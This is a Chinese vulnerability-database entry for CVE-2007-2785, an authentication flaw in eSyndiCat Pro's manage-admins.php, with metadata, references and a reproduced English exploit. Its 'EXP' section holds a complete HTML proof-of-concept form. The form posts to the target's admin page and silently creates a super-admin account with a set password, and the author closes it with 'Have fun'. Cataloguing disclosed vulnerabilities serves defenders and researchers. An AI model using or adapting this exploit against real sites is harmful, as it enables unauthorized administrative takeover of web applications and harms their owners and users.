eSyndiCat Pro 'manage-admins.php'漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1190484 漏洞类型 未知
发布时间 2007-05-21 更新时间 2007-05-21
CVE编号 CVE-2007-2785 CNNVD-ID CNNVD-200705-411
漏洞平台 N/A CVSS评分 6.8
|漏洞来源
https://www.securityfocus.com/bid/86108
https://cxsecurity.com/issue/WLB-2007050081
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-411
|漏洞详情
eSyndiCatPro中的manage-admins.php文件允许远程攻击者借助添加操作中的修改过的用户名、new_pass、new_pass2、status、super和特定的其他参数,创建额外的管理账户和造成其他未明影响。
|漏洞EXP
eSyndiCat is Directory websystem, a product of eSyndiCat.com
It has security hole allow attackers get admin and more and more.
Infected version: eSyndiCat Pro v1.x
Infected file: manage-admins.php
Use poc file to attack:

------------------------------------------------
<p>Discovered by H2P - A member of http://vnbrain.net
<form action="http://target/path/admin/manage-admins.php?action=add" method="post">
<table cellspacing="0" cellpadding="0" width="100%" class="striped">
<tr>
	<td width="200"><strong>Admin username:</strong></td>
	<td><input type="text" name="username" size="22" value="checked"/></td>
</tr>
<tr>
	<td><strong>Admin Fullname:</strong></td>
	<td><input type="text" name="fullname" size="22" value="Check Only"/></td>
</tr>
<tr>
	<td><strong>Admin Email:</strong></td>
	<td>
	<input type="text" name="email" size="22" value="hack2prison (at) freeprotect (dot) net [email concealed]" /></td>
</tr>
<tr>
	<td><strong>Admin password:</strong></td>
	<td><input type="password" name="new_pass" size="22" value="123456" /></td>
</tr>
<tr>
	<td><strong>Admin Password Confirmation:</strong></td>
	<td><input type="password" name="new_pass2" size="22" value="123456" /></td>
</tr>
<tr>
	<td><strong>Admin Status:</strong></td>
		<td><select name="status">
			<option value="active" >Active</option>
			<option value="approval" >Approval</option>		
		</select></td>
</tr>
<tr>
	<td><strong>Submission Notification:</strong></td>
		<td><input type="radio" name="submit_notif" value="1" id="lsn1" checked="checked" /><label for="lsn1">Enabled</label>
		<input type="radio" name="submit_notif" value="0" id="lsn0" /><label for="lsn0">Disabled</label>
	</td>
</tr>
<tr>
	<td><strong>Payment Notification:</strong></td>
		
	<td><input type="radio" name="payment_notif" value="1" id="lpn1" checked="checked" /><label for="lpn1">Enabled</label>
		<input type="radio" name="payment_notif" value="0" id="lpn0" /><label for="lpn0">Disabled</label>
	</td>
</tr>
	
<tr>
	<td class="caption" colspan="2"><strong>Admin Permissions</strong></td>
</tr>
<tr>
	<td><strong>Super Admin:</strong></td>
			<td><input type="radio" name="super" value="1" id="type1" checked="checked" onclick="javascript:document.getElementById('permissions').style.display
='none';" /><label for="type1">Enabled</label>
		<input type="radio" name="super" value="0" id="type0"  onclick="javascript:document.getElementById('permissions').style.display
='block';"/><label for="type0">Disabled</label>
	</td>
</tr>
</table>

<table cellspacing="0" width="100%">
<tr class="all">
	<td colspan="2"><input type="submit" name="save" value="Save Changes" />
		<input type="hidden" name="id" value="" />
		<input type="hidden" name="action" value="add" />
	</td>
</tr>
</table>
</form>
------------------------------------------------

Have fun
|受影响的产品
eSyndiCat eSyndiCat Pro 1.x
|参考资料

来源:BUGTRAQ
名称:20070518eSyndiCatInputValidationErrorVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/468966/100/0/threaded
来源:XF
名称:esyndicat-manageadmins-unauthorized-access(34371)
链接:http://xforce.iss.net/xforce/xfdb/34371
来源:SREASON
名称:2729
链接:http://securityreason.com/securityalert/2729